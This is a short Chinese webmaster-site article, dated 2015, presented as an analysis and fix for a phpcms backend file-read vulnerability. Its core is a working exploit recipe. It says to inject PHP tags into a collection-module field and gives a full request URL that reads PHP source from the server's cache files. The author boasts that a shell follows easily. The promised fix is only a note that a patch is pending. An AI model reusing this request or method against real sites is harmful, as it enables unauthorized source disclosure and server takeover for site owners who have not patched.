站长之家 - 站长资讯 - 易采站长站

当前位置: > 建站教程 > 源码教程 > CMS 教程 >

phpcms后台普通用户读文件0day的分析以及修复方法

2015-05-03 19:38 | 来源:网络整理 | 编辑:秋军 |

后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁

  • ECSHOP后台二次开发模块教程一-ECshop教程
  • ecshop后台商品列表显示商品缩略图-ECshop教程
  • dedecms 5.7的后台验证码不显示的解决办法-DedeCms教程
  • DEDECMS后台无法登陆并跳转回登陆界面的解决方法-DedeCms教程
  • dedecms后台广告管理无法添加的解决办法-DedeCms教程
  • Dedecms 5.7安装后登录后台500错误的解决办法-DedeCms教程
  • 在ecshop后台订单信息页或打印页显示商品缩略图-ECshop教程
  • ECSHOP后台自定义价格区间-ECshop教程
  • DEDECMS登录后台打开缓慢的解决办法-DedeCms教程
  • 如何修改ECSHOP后台订单列表的商品缩略图尺寸-ECshop教程
  • 网友评论

    关于我们 - 联系我们 - 广告服务 - 版权声明 - 人才招聘 - 友情链接 - 网站地图 - 帮助 - -

    CopyRight © 2010-2016 源码下载 easck.com , All Rights Reserved

    蒙公网安备 15052402000103号

    蒙ICP备14002389-1号